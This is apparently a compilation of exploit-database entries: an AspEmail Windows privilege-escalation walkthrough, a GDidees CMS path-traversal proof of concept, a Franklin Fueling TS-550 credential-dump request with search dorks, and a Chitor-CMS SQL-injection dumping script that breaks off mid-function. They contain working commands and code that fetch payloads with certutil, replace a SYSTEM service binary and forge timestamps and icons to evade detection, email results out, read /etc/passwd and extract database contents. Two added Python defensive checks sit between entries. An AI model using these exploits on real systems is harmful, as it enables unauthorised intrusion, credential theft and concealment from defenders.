#################################################################################################################### # Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation # # Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] # # Date: 13/04/2023 # # Exploit Author: Zer0FauLT [[email protected]] # # Vendor Homepage: https://www.aspemail.com # # Software Link: https://www.aspemail.com/download.html # # Product: AspEmail # # Version: AspEmail 5.6.0.2 and all # # Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU # # Tested on: Windows Server 2016 and Windows Server 2019 # # CVE : 0DAY # #################################################################################################################### # ================================================================================================================== [+] C:\PenTest>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled # ================================================================================================================== * First, we will test whether the AspEmail service is active. * First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running: [+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe EmailAgent.exe 4400 Persits Software EmailAgent or [+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe EmailAgent64.exe 4400 Persits Software EmailAgent * We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING". 
* Now we know that the AspEmail service is active.

# ==================================================================================================================

* We will need these:

[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe"   <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"

# ==================================================================================================================

[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Name              : Persits Software EmailAgent
ImagePath         : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email Agent.exe" /run
User              : LocalSystem
ModifiablePath    : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions       : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status            : Unknown
UserCanStart      : False
UserCanStop       : False

[+] C:\PenTest>del PrivescCheck.ps1

* We detected the "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.
# ==================================================================================================================

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.

* We do not have permission to access subdirectories.

# ==================================================================================================================

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                                                     DeepSecLab\psacln:(I)(OI)(CI)(N)
                                                     DeepSecLab\psaadm:(I)(OI)(CI)(N)
                                                     DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
                                                     BUILTIN\Administrators:(I)(F)
                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
                                                     NT SERVICE\TrustedInstaller:(I)(CI)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Users:(I)(OI)(CI)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)

* Unlike the other directories, we have full privileges in the "BIN" directory of the service.
* This is chmod 0777 - rwxrwxrwx in Linux terms.
# ==================================================================================================================

[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID

__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"

\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"  root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-32-544"  Win32_SID  Win32_SID  2  Administrators  {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}  BUILTIN  S-1-5-32-544  16

[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators

* We understood that the "EmailAgent.exe" process was installed by the Administrator and that the owner is the Administrator user.

# ==================================================================================================================

* Now we will take ownership of this directory, as we will execute our operations under the "BIN" directory.

[+] C:\PenTest>whoami
DeepSecLab\Hacker

[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files

* Ok. All commands completed successfully. We now have full privileges for this directory.

# ==================================================================================================================

* Now we will modify the EmailAgent file and inject a self-written piece of malware.
* We will be careful not to damage any files while doing this, so that all transactions can be easily undone.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe

# ==================================================================================================================

[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
 Volume in drive C has no label.
 Volume Serial Number is 0C8A-5291

 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

14.04.2023  16:47    <DIR>          .
14.04.2023  16:47    <DIR>          ..
01.03.2004  15:55           143.360 AspEmail.dll
25.02.2004  16:23           188.416 AspUpload.dll
13.04.2023  22:00            12.288 EmailAgent.exe   <<<=== ReNamed for EmailAgentPrivESC.exe
24.09.2003  09:22           139.264 EmailAgentCfg.cpl
24.09.2003  09:25            94.208 EmailLogger.dll
24.09.2003  09:21           167.936 Null.EmailAgent.exe
               6 File(s)        745.472 bytes
               2 Dir(s)  165.936.717.824 bytes free

# ==================================================================================================================

* We now set the Last Modified Date, Creation Date and Last Accessed Date.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe

* Next, we extract the real EmailAgent.exe file's icon and apply it to the exploit. This way, we make it harder to detect.
* I used the Resource Tuner Console tool.
  >>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can be done easily with the Resource Tuner tool.
  >>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
  >>> http://www.restuner.com/download.htm

# ==================================================================================================================

[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
 Volume in drive C has no label.
 Volume Serial Number is 0C8A-5291

 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

14.04.2023  16:47    <DIR>          .
14.04.2023  16:47    <DIR>          ..
01.03.2004  15:55           143.360 AspEmail.dll
25.02.2004  16:23           188.416 AspUpload.dll
24.09.2003  09:21            12.288 EmailAgent.exe
24.09.2003  09:22           139.264 EmailAgentCfg.cpl
24.09.2003  09:25            94.208 EmailLogger.dll
24.09.2003  09:21           167.936 Null.EmailAgent.exe
               6 File(s)        745.472 bytes
               2 Dir(s)  165.936.717.824 bytes free

[24.09.2003 09:21]    12.288 EmailAgent.exe
[24.09.2003 09:21]   167.936 Null.EmailAgent.exe

* And the time manipulation is over. They look like they were uploaded at the same time long ago.

# ==================================================================================================================

* Now we check the ownership of my malware.

[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID

__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"

\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"  root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"  Win32_SID  Win32_SID  2  Hacker  {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0}  DeepSecLab  S-1-5-21-3674093405-176013069-2091862131-1511  28

[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLab\Hacker

EmailAgent.exe Owner: DeepSecLab\Hacker

# =================================================================================================================#
#                                                                                                                  #
####################################################################################################################
#                                                 #[EmailAgent.cs]#                                                #
####################################################################################################################
#                                                                                                                  #
# * We program this malware in such a way that when the server is rebooted (when the services are restarted),      #
# * it will be triggered and execute the code we want,                                                             #
# * and then send a printout of all this to the email address we specified.                                        #
#                                                                                                                  #
# using System;
# using System.Linq;
# using System.Text;
# using System.Diagnostics;
# using System.IO;
# using System.Collections;
#
# // Cli is a helper class of the author's that is not included in this advisory.
# namespace CliToolSpace
# {
#     class _Main
#     {
#         static void Main(string[] args)
#         {
#             Cli commandLine = new Cli();
#             commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat");
#             commandLine.Execute();
#             commandLine.ToFile(@"C:\Windows\Temp\");
#         }
#     }
# }
#
####################################################################################################################
#                                                 #[Mail.cs]#                                                      #
####################################################################################################################
#
# using System;
# using System.Net.Mail;
# using System.Net;
#
# SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");
# var mail = new MailMessage();
# mail.From = new MailAddress("[email protected]");
# mail.To.Add("[email protected]");
# mail.Subject = "Trigger Successful!";
# mail.IsBodyHtml = true;
# string htmlBody;
# htmlBody = "<strong>This server has been rebooted.</strong>";
# mail.Body = htmlBody;
# Attachment attachment;
# attachment = new Attachment(@"C:\Windows\Temp\Export.txt");
# mail.Attachments.Add(attachment);
# SmtpServer.Port = 587;
# SmtpServer.UseDefaultCredentials = false;
# SmtpServer.Credentials = new System.Net.NetworkCredential("[email protected]","p@ssw0rd123");
# SmtpServer.EnableSsl = true;
# SmtpServer.Timeout = int.MaxValue;
# SmtpServer.Send(mail);
#
####################################################################################################################
#                                                 #[Run.bat]#                                                      #
####################################################################################################################
#
# whoami > C:\Windows\Temp\Export.txt
# cd C:\Program Files (x86)\Persits Software\AspEmail\Bin
# del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe
# cd c:\Windows\Tasks
# del Run.bat & del Mail.exe
#
####################################################################################################################
#
# [+]Trigger Successful![+]
#
# [+] C:\PenTest>systeminfo | findstr "Boot Time"
# System Boot Time:          13.04.2022, 07:46:06
#
####################################################################################################################
#                                                 #[Export.txt]#                                                   #
####################################################################################################################
#
# NT AUTHORITY\SYSTEM
#
####################################################################################################################

# ==================================================================================================================
# ...|||[FIX]|||...
# ==================================================================================================================

[+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+]

# =================================================================================================================#

[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS

SERVICE_Name: Persits Software EmailAgent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_Name   : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_Name       : Persits Software EmailAgent
        DEPENDENCIES       : rpcss
        SERVICE_START_Name : LocalSystem

# ==================================================================================================================

[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

# ==================================================================================================================

[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Persits Software EmailAgent
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS

# ==================================================================================================================

[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.

DONE!
# ==================================================================================================================

[+] C:\Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"

* These commands are optional. They are used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.

# ==================================================================================================================
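The root cause above is an ACL, not a bug in the binary: the service runs as LocalSystem from a directory that grants Everyone full control, so anyone who can log on can swap the executable. That condition can be audited from ICACLS output before anyone exploits it. The following Python is an added example and is not part of the advisory or of AspEmail: it parses an ICACLS directory listing (the BIN listing printed above, embedded here as sample input), separates inheritance flags from rights, flags ACEs that grant write rights to low-privilege principals, and raises a finding only when the owning service also runs under a privileged account. The principal list, the rights set and the audit_service helper are this example's own choices.

```python
import re
from dataclasses import dataclass

# Constructed sample: the ICACLS listing for the service's BIN directory as printed in
# the advisory above, reproduced here as test input.
BIN_PATH = r"C:\Program Files (x86)\Persits Software\AspEmail\BIN"
ICACLS_OUTPUT = r"""C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                                                     DeepSecLab\psacln:(I)(OI)(CI)(N)
                                                     BUILTIN\Administrators:(I)(F)
                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
                                                     NT SERVICE\TrustedInstaller:(I)(CI)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Users:(I)(OI)(CI)(RX)
"""

# Principals every local account belongs to (example's own list). Write rights for
# them on a directory holding a LocalSystem service binary are an escalation path.
LOW_PRIV_PRINCIPALS = {
    "Everyone",
    r"BUILTIN\Users",
    r"NT AUTHORITY\Authenticated Users",
    r"NT AUTHORITY\INTERACTIVE",
}

# ICACLS rights that allow adding, replacing, renaming or deleting files in the
# directory, or rewriting its ACL / owner (example's own selection).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "D", "WDAC", "WO"}
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)$")


@dataclass(frozen=True)
class Ace:
    principal: str
    inheritance: frozenset
    rights: frozenset


def parse_icacls(output, path):
    """Parse one ICACLS directory listing into Ace records."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):            # only the first line carries the path
            line = line[len(path):].strip()
        match = ACE_RE.match(line)
        if not match:
            continue
        inherit, rights = set(), set()
        for group in re.findall(r"\(([^)]*)\)", match.group("flags")):
            for token in group.split(","):   # specific rights come comma-separated
                token = token.strip()
                (inherit if token in INHERIT_FLAGS else rights).add(token)
        aces.append(Ace(match.group("principal"), frozenset(inherit), frozenset(rights)))
    return aces


def low_priv_writers(aces):
    """Low-privilege principals that can modify the directory's contents.
    Inherit-only ACEs (IO) do not apply to the directory itself and are skipped."""
    hits = []
    for ace in aces:
        if ace.principal not in LOW_PRIV_PRINCIPALS or "IO" in ace.inheritance:
            continue
        granted = sorted(ace.rights & WRITE_RIGHTS)
        if granted:
            hits.append((ace.principal, granted))
    return hits


def binary_directory(image_path):
    """Directory part of a service ImagePath such as '"C:\\dir\\Agent.exe" /run'."""
    path = image_path.strip()
    if path.startswith('"'):
        path = path[1:path.index('"', 1)]
    else:
        path = path.split(" ", 1)[0]
    return path.rsplit("\\", 1)[0]


def audit_service(name, image_path, run_as, icacls_output):
    """A finding only when a privileged service account runs a binary out of a
    directory that low-privilege principals can write to."""
    bin_dir = binary_directory(image_path)
    writers = low_priv_writers(parse_icacls(icacls_output, bin_dir))
    privileged = run_as.lower() in {"localsystem", r"nt authority\system"}
    if writers and privileged:
        return {"service": name, "run_as": run_as, "directory": bin_dir, "writable_by": writers}
    return None
```

On a live host the same function would be fed the output of `sc qc` (BINARY_PATH_Name, SERVICE_START_Name) and `ICACLS <dir>` for every service; the fix shown later in the advisory, resetting the ACL with ICACLS /RESET, is exactly what makes this check come back clean.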
-
GDidees CMS 3.9.1 - Local File Disclosure
# Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure
# Date : 03/27/2023
# Exploit Author : Hadi Mene
# Vendor Homepage : https://www.gdidees.eu/
# Software Link : https://www.gdidees.eu/cms-1-0.html
# Version : 3.9.1 and earlier
# Tested on : Debian 11
# CVE : CVE-2023-27179

### Summary:

GDidees CMS v3.9.1 and lower versions were discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php.

### Description :

Imgdownload.php is mainly used by the QR code generation module to download a QR code. The vulnerability occurs in line 4, where the filename parameter, which is opened later, is not filtered or sanitized. Furthermore, there is no admin session check in this code, as there should be, since only the admin user should normally be able to download a QR code.

Vulnerable Code :

3.  if (isset($_GET["filename"])) {
4.      $filename=$_GET["filename"];
.....
.....
27.     @readfile($filename) OR die();

### POC :

URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd

Exploitation using curl

# curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
ntp:x:104:110::/nonexistent:/usr/sbin/nologin
messagebus:x:105:111::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
vboxadd:x:998:1::/var/run/vboxadd:/bin/false
openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false

### References:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179
https://nvd.nist.gov/vuln/detail/CVE-2023-27179
https://www.exploit-db.com/papers/12883
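The defect on line 4 is that a user-supplied name is handed straight to readfile(). The hardening is to resolve the name under a fixed directory and refuse anything that ends up outside it, after undoing the percent-encoding an attacker can stack to get past a naive "../" filter. The following Python is an added example, not GDidees code: resolve_download() decodes the name until it is stable, rejects NUL bytes, absolute paths and escapes from the base directory, and then applies an extension allow-list. QR_DIR, the .png allow-list and the function names are this example's own assumptions; the admin session check the advisory also calls for is separate and is not modelled here.

```python
import posixpath
from urllib.parse import unquote

# Directory the download endpoint may serve from. Constructed for this example; the
# page does not give the CMS install layout.
QR_DIR = "/var/www/cms/_admin/qrcodes"
ALLOWED_SUFFIXES = (".png",)


def fully_decode(value, max_rounds=3):
    """Undo percent-encoding until the value stops changing, so %2e%2e and %252e%252e
    are both seen as '..'. Returns None if it is still changing after max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return None


def resolve_download(requested, base_dir=QR_DIR, allowed_suffixes=ALLOWED_SUFFIXES):
    """Map a user-supplied filename onto a path inside base_dir.
    Returns (path, "ok") on success or (None, reason) on rejection."""
    name = fully_decode(requested)
    if name is None:
        return None, "excessive encoding"
    if "\x00" in name:
        return None, "NUL byte in filename"
    name = name.replace("\\", "/")          # treat backslashes as separators as well
    if name.startswith("/"):
        return None, "absolute path"
    base = posixpath.normpath(base_dir)
    # normpath collapses every '..' so the containment test sees the real target
    candidate = posixpath.normpath(posixpath.join(base, name))
    if not candidate.startswith(base + "/"):
        return None, "path escapes base directory"
    if not candidate.lower().endswith(allowed_suffixes):
        return None, "disallowed file type"
    return candidate, "ok"
```

The containment test is done on the normalised string rather than by searching for "../", which is why encoded, double-encoded and backslash variants all land in the same branch; the allow-list is a second, independent line of defence for the case where the directory check is ever bypassed.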
-
Franklin Fueling Systems TS-550 - Default Password
# Exploit Title: Franklin Fueling Systems TS-550 - Default Password
# Date: 4/16/2023
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)
# Version: TS-550
# Tested on: Linux/Android(termux)

Step 1 : an attacker can use these dorks to find the panel

inurl:"relay_status.html"
inurl:"fms_compliance.html"
inurl:"fms_alarms.html"
inurl:"system_status.html"
inurl:"system_reports.html"
inurl:"tank_status.html"
inurl:"sensor_status.html"
inurl:"tank_control.html"
inurl:"fms_reports.html"
inurl:"correction_table.html"

Step 2 : the attacker can send the request

curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi

Step 3 : if the response looks like this

<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
<DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>
<ROLE_LIST>
<ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
<ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
<ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>
</ROLE_LIST>

Step 4 : the attacker can crack the hashes using John the Ripper

Notice : most of the panels' password is : admin

Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
-
Chitor-CMS v1.1.2 - Pre-Auth SQL Injection
#!/usr/bin/python3
#######################################################
#                                                     #
# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection
# Date: 2023/04/13                                    #
# ExploitAuthor: msd0pe                               #
# Project: https://github.com/waqaskanju/Chitor-CMS   #
# My Github: https://github.com/msd0pe-1              #
# Patched the 2023/04/16: 69d3442 commit              #
#                                                     #
#######################################################

__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
__author__ = 'msd0pe'
__version__ = '1.1'
__date__ = '2023/04/13'


class bcolors:
    PURPLE = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    OCRA = '\033[93m'
    RED = '\033[91m'
    CYAN = '\033[96m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


class infos:
    INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
    ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
    GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
    PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "


import re
import requests
import optparse
from prettytable import PrettyTable

# Result rows are wrapped between these two marker strings (hex 0x71707a6b71 / 0x716a6b6271
# in the payloads) so they can be cut out of the HTML response with a regex.
MARKER_RE = r"qpzkq\[(.*?)\]qjkbq"


def DumpTable(url, database, table):
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    columns = []
    # first query: column names of the chosen table
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall(MARKER_RE, u.text)
        r = r[0].replace('\"', "").split(',')
        if r == []:
            pass
        else:
            for i in r:
                columns.append(i)
    except:
        pass
    x.field_names = columns
    # second query: the rows, each column joined with the separator 0x787a6d64706c ("xzmdpl")
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[", "").replace("]", "").replace("\'", "").replace(" ", "") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall(MARKER_RE, u.text)
        r = r[0].replace('\"', "").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                x.add_rows([i])
    except ValueError:
        # a row with a trailing empty column comes back one field short; pad it
        r = re.findall(MARKER_RE, u.text)
        r = r[0].replace('\"', "").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                i.append("")
                x.add_rows([i])
    print(x)


def ListTables(url, database):
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    x.field_names = ["TABLES"]
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall(MARKER_RE, u.text)
        r = r[0].replace('\"', "").split(',')
        if r == []:
            pass
        else:
            for i in r:
                x.add_row([i])
    except:
        pass
    print(x)


def ListDatabases(url):
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    x.field_names = ["DATABASES"]
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
    u = requests.get(url + payload, headers=header)
    try:
